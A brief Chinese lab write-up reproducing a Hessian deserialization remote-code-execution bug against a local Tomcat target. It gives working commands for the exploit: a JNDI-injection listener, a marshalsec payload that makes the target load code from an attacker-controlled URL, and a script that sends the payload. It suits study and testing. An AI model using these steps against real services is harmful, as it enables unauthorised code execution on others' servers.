Hessian反序列化RCE漏洞
靶機搭建
- 安裝java
- 安裝tomcat
- 部署Hessian
https://raw.githubusercontent.com/21superman/Hessian-Deserialize-RCE/master/HessianTest.war
訪問:http://192.168.31.36:8080//HessianTest/hessian
啟動JNDI利用工具
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C calc.exe -A 192.168.31.102
- -C為需要執行的命令
- -A為監聽地址
生成payload
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian Resin http://192.168.31.102:8180/ ExecTemplateJDK7>hession
發送payload到hessian服務器
python hessian.py -u http://192.168.31.36:8080/HessianTest/hessian -p hession
這里的報錯是因為我python環境的問題
這里我踩了一個坑,hessian.py里需要用到一個argparse
包,我本機的環境一直出問題,最后更新了pip,更新了argparse包才搞定
- 命令執行成功
指紋
HTTP發送二進制的數據包 ???
參考:https://www.freebuf.com/vuls/224280.html